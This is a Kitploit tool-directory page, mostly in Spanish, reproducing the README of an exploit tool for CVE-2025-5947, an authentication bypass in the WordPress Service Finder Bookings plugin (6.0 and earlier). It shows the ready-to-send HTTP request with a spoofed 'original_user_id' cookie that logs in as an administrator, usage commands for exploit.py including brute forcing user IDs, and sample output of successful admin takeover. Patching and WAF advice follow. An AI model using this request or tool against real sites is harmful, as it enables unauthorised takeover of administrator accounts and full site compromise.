Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/xxconi/cve-2025-5947
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

Ver Repositorio
5hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

Herramienta de exploit para la vulnerabilidad de omisión de autenticación en el plugin de WordPress Service Finder Bookings ≤ 6.0

📋 Índice

  • Acerca de la Vulnerabilidad
  • Detalles Técnicos
  • Instalación
  • Uso
  • Ejemplos
  • Resultados
  • Seguridad
  • Recursos

🔴 Acerca de la Vulnerabilidad

CVE-2025-5947

El plugin Service Finder Bookings de WordPress, en sus versiones 6.0 y anteriores, presenta una vulnerabilidad crítica de omisión de autenticación.

🎯 Impacto

Los atacantes no autenticados pueden:

  • ✅ Iniciar sesión como cualquier usuario
  • ✅ Obtener acceso a cuentas de administrador
  • ✅ Conseguir el control total del sistema
  • ✅ Exfiltrar datos
  • ✅ Cargar código malicioso

🔍 Detalles Técnicos

Causa de la Vulnerabilidad

Hay una validación insuficiente de cookies en la función service_finder_switch_back():

root@kitploit:~
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // Doğrulama yok!
}

Vector de Ataque

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

Características del Ataque:

  • 🌐 Acceso Remoto (AV:N)
  • 🔓 Sin Autenticación (PR:N)
  • 👤 Sin Interacción del Usuario (UI:N)
  • 📊 Impacto Total (C:H, I:H, A:H)

📦 Instalación

Requisitos

  • Python 3.6+
  • Librería requests

Paso 1: Clonar el Repositorio

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

Paso 2: Instalar las Dependencias

root@kitploit:~
pip install -r requirements.txt

Paso 3: Ejecutar

root@kitploit:~
python exploit.py -u http://target.com

🚀 Uso

Comandos Básicos

root@kitploit:~
# Yardım göster
python exploit.py -h

# Admin (ID=1) olarak giriş dene
python exploit.py -u http://target.com

# Belirli kullanıcı ID'si ile
python exploit.py -u http://target.com -i 5

# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# SSL doğrulaması olmadan
python exploit.py -u http://target.com --no-ssl-verify

# Özel timeout ile
python exploit.py -u http://target.com -t 30

Parámetros

💡 Ejemplos

Ejemplo 1: Exploit Simple

root@kitploit:~
python exploit.py -u http://wordpress.local

Salida:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu

🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/

Ejemplo 2: Fuerza Bruta

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

Salida:

root@kitploit:~
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]

Ejemplo 3: HTTPS sin Verificación SSL

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 Resultados

Un exploit exitoso incluye los siguientes indicadores:

  • ✅ Código de respuesta HTTP 301 o 302
  • ✅ Presencia de /wp-admin/ en la cabecera Location
  • ✅ Presencia de wordpress_logged_in_ en la cabecera Set-Cookie

🛡️ Seguridad

⚠️ Aviso Legal

Esta herramienta debe utilizarse únicamente para:

  • ✅ Pruebas de seguridad autorizadas
  • ✅ En tus propios sistemas
  • ✅ Con permiso por escrito

El autor no se hace responsable.

🔐 Medidas de Protección

  1. Actualización Urgente

    root@kitploit:~
    # WordPress admin panelinden güncelle
    # veya WP-CLI ile
    wp plugin update sf-booking
    
  2. Desactivar el Plugin

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. Eliminar el Plugin

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. Web Application Firewall (WAF)

    root@kitploit:~
    Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. Comprobación de Seguridad

    • Revisa las cuentas de administrador
    • Examina los registros de acceso
    • Investiga accesos no autorizados

📚 Recursos

  • Base de datos de Patchstack
  • GitHub Advisory
  • Detalles NVD
  • Exploit Original
  • Calculadora CVSS

🤝 Contribuciones

Para informar errores o sugerir mejoras:

  1. Haz un fork
  2. Crea una rama de características (git checkout -b feature/improvement)
  3. Haz un commit (git commit -am 'Add improvement')
  4. Haz un push (git push origin feature/improvement)
  5. Abre un Pull Request

📄 Licencia

Licencia MIT: para más detalles, consulta el archivo LICENSE

👤 Autor

Investigador de Seguridad

  • GitHub: @yourusername

🙏 Agradecimientos

  • Patchstack Security Team
  • WordPress Security Community
  • CVE Coordinators

⭐ ¡Si te resultó útil, dale una estrella!

🔝 Volver Arriba

Descargar herramienta
CaracterísticaValor
CVE IDCVE-2025-5947
PluginService Finder Bookings (sf-booking)
Versión Afectada≤ 6.0
Gravedad🔴 CRÍTICO
Puntuación CVSS9.8
CWECWE-639 (Authorization Bypass)
Puntuación EPSS0.617 (percentil 98.357)
Fecha de Publicación2025
ParámetroAbreviaturaDescripciónPor Defecto
--url-uURL de destino (obligatorio)-
--user-id-iID de usuario1
--brute-force-bRango de fuerza bruta (1-10)-
--no-ssl-verify-Deshabilitar verificación SSLFalse
--timeout-tTimeout de solicitud (segundos)10